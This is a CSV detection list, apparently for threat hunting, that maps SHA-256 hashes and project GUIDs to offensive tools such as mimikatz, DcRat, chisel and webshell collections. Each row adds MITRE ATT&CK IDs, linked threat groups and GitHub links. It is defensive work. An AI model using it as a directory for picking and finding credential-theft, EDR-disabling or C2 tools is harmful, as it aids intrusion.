"*d6255ae708bec781472a76a4cf10d9a53943a05ceeddc0737384cffe3eb38e29*",".{0,1000}d6255ae708bec781472a76a4cf10d9a53943a05ceeddc0737384cffe3eb38e29.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39779"
"*d62a0e8ea863d3812dcbf3927534db6b2a82223f2bfd2c374c7263be98b855f1*",".{0,1000}d62a0e8ea863d3812dcbf3927534db6b2a82223f2bfd2c374c7263be98b855f1.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","39780"
"*d6304a65276af87fe87a4cddf75f571d1c73c601710fffebe9da17d762d521d2*",".{0,1000}d6304a65276af87fe87a4cddf75f571d1c73c601710fffebe9da17d762d521d2.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#filehash","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","39781"
"*d638f69107aa7957c7b4df0ae94e60f36d3a52b91dcc182710b6e9e8cd2696a3*",".{0,1000}d638f69107aa7957c7b4df0ae94e60f36d3a52b91dcc182710b6e9e8cd2696a3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39783"
"*d639357536f4da8d953172982a82a87c028a8fb3e4e89307ebff92f5d6c99287*",".{0,1000}d639357536f4da8d953172982a82a87c028a8fb3e4e89307ebff92f5d6c99287.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39784"
"*D640C36B-2C66-449B-A145-EB98322A67C8*",".{0,1000}D640C36B\-2C66\-449B\-A145\-EB98322A67C8.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","39787"
"*d64995d25e55ebb524c83a516e8996cc3e3dd8cb03b7332f8ad95a5c775385b0*",".{0,1000}d64995d25e55ebb524c83a516e8996cc3e3dd8cb03b7332f8ad95a5c775385b0.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39789"
"*D64E40BB-9DAC-4491-8406-2CA2F2853F76*",".{0,1000}D64E40BB\-9DAC\-4491\-8406\-2CA2F2853F76.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","39791"
"*d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4*",".{0,1000}d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39792"
"*d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68*",".{0,1000}d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39793"
"*d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290*",".{0,1000}d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39794"
"*d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290*",".{0,1000}d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39795"
"*d653c01c040b025f77eda69eaff1b33f0e1f8542fc409dd42e936e35de22ff97*",".{0,1000}d653c01c040b025f77eda69eaff1b33f0e1f8542fc409dd42e936e35de22ff97.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","39796"
"*d65432a573f67dd33aada2c4dd6ff20d76a7235b2f525979aac588702c4e2364*",".{0,1000}d65432a573f67dd33aada2c4dd6ff20d76a7235b2f525979aac588702c4e2364.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","39798"
"*d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9*",".{0,1000}d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39799"
"*d65a63d32b46e3b20f42174834f5a367ab0ffbfc1b0bd4b368613c86d01a71e2*",".{0,1000}d65a63d32b46e3b20f42174834f5a367ab0ffbfc1b0bd4b368613c86d01a71e2.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","39800"
"*d65a7eed824f91e0ff00f273650903c1e14335dab57480e6e09a83675c4b407a*",".{0,1000}d65a7eed824f91e0ff00f273650903c1e14335dab57480e6e09a83675c4b407a.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","39801"
"*d65eb27a092bb12505201a91b0f602c6c7dfc81d5c6073d8032bc9d592ed3fa0*",".{0,1000}d65eb27a092bb12505201a91b0f602c6c7dfc81d5c6073d8032bc9d592ed3fa0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39802"
"*d65fc5abbf245e6cca94de0ba4e5da6d68c75f4905e80da957bb50afc475fcac*",".{0,1000}d65fc5abbf245e6cca94de0ba4e5da6d68c75f4905e80da957bb50afc475fcac.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39803"
"*d6658fde26b809968ead7f1b80dbabe0738ad07a6906ab5e809e04aa156c9566*",".{0,1000}d6658fde26b809968ead7f1b80dbabe0738ad07a6906ab5e809e04aa156c9566.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39804"
"*d66d64d4f3db00002708c51dc67e916c760e749f71c32c0a35943106371ac654*",".{0,1000}d66d64d4f3db00002708c51dc67e916c760e749f71c32c0a35943106371ac654.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39806"
"*d66e5c655b6ecf6108ebdba4c14b669f8b9dc4c18cfd8eb309878ad936fdc2b9*",".{0,1000}d66e5c655b6ecf6108ebdba4c14b669f8b9dc4c18cfd8eb309878ad936fdc2b9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","39807"
"*d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809*",".{0,1000}d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","39808"
"*d67c342b9ffebd2350cb81d6dbbb35071246fb19*",".{0,1000}d67c342b9ffebd2350cb81d6dbbb35071246fb19.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","39811"
"*d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817*",".{0,1000}d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","39812"
"*d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817*",".{0,1000}d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","39813"
"*d685191b55fec64ce5fa0ced8bff472aa1a297d0e77354da28f34d0f67a4dec4*",".{0,1000}d685191b55fec64ce5fa0ced8bff472aa1a297d0e77354da28f34d0f67a4dec4.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","39814"
"*d68790ec9278e5bcaddc365ff394278cd02e55b0a1526a5f9e7df9dcbc7d25db*",".{0,1000}d68790ec9278e5bcaddc365ff394278cd02e55b0a1526a5f9e7df9dcbc7d25db.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","39816"
"*d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507*",".{0,1000}d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39819"
"*D6948EFC-AA15-413D-8EF1-032C149D3FBB*",".{0,1000}D6948EFC\-AA15\-413D\-8EF1\-032C149D3FBB.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","39820"
"*d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b*",".{0,1000}d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39821"
"*d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522*",".{0,1000}d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39822"
"*D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07*",".{0,1000}D6AAED62\-BBFC\-4F2A\-A2A4\-35EC5B2A4E07.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#GUIDproject","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","39823"
"*d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c*",".{0,1000}d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39824"
"*d6b5056c0a990f73c3f22aee2a6065812d1f78fc87e0362877716ddffd71d831*",".{0,1000}d6b5056c0a990f73c3f22aee2a6065812d1f78fc87e0362877716ddffd71d831.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39825"
"*d6b6a59d5127bab7f135eb30f63484589a812fa16eac15068ba4e74a51c92f6b*",".{0,1000}d6b6a59d5127bab7f135eb30f63484589a812fa16eac15068ba4e74a51c92f6b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39826"
"*d6bd37f7c1bcc7ea255d46c3f8f07e6fd754f566dd05682584def7c8ba0aebf9*",".{0,1000}d6bd37f7c1bcc7ea255d46c3f8f07e6fd754f566dd05682584def7c8ba0aebf9.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","39827"
"*d6bf093219aa31e78949446443ddda4efac3bfabd3f1d19222a9b394cedc1a96*",".{0,1000}d6bf093219aa31e78949446443ddda4efac3bfabd3f1d19222a9b394cedc1a96.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39828"
"*d6c0b483cd33449f5b0f5116e07f8afdb639d1d3137912ce5d585bce4203a02e*",".{0,1000}d6c0b483cd33449f5b0f5116e07f8afdb639d1d3137912ce5d585bce4203a02e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39829"
"*d6d9c093418581fe4a58b4e2d8673f063f216dd23d7cd65f5f366cc714149b07*",".{0,1000}d6d9c093418581fe4a58b4e2d8673f063f216dd23d7cd65f5f366cc714149b07.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39832"
"*d6db60417e9ca985a89101f7aa8b06a021fde4f5f7f7a58fa21b048008df2e56*",".{0,1000}d6db60417e9ca985a89101f7aa8b06a021fde4f5f7f7a58fa21b048008df2e56.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39833"
"*d6e360d8a78cb4495df17f401df3a5c11d3ae13e46ebe7d94007bfb1d263490c*",".{0,1000}d6e360d8a78cb4495df17f401df3a5c11d3ae13e46ebe7d94007bfb1d263490c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39835"
"*d6edddd2dcac14dfe70c6b396236d6d3a95b0c1f6fe8fec38381049f3823bdb6*",".{0,1000}d6edddd2dcac14dfe70c6b396236d6d3a95b0c1f6fe8fec38381049f3823bdb6.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","39838"
"*d6f5f4e0aa4e8a9b34887f008ff0882a4f3738d35c9df9c023512d1d5f6d9871*",".{0,1000}d6f5f4e0aa4e8a9b34887f008ff0882a4f3738d35c9df9c023512d1d5f6d9871.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39839"
"*d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9*",".{0,1000}d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39840"
"*d6fea46b2c10f12284b38995e9b6cee32b2122ea9ba65c00c0c3cc5eb7448e5d*",".{0,1000}d6fea46b2c10f12284b38995e9b6cee32b2122ea9ba65c00c0c3cc5eb7448e5d.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","39841"
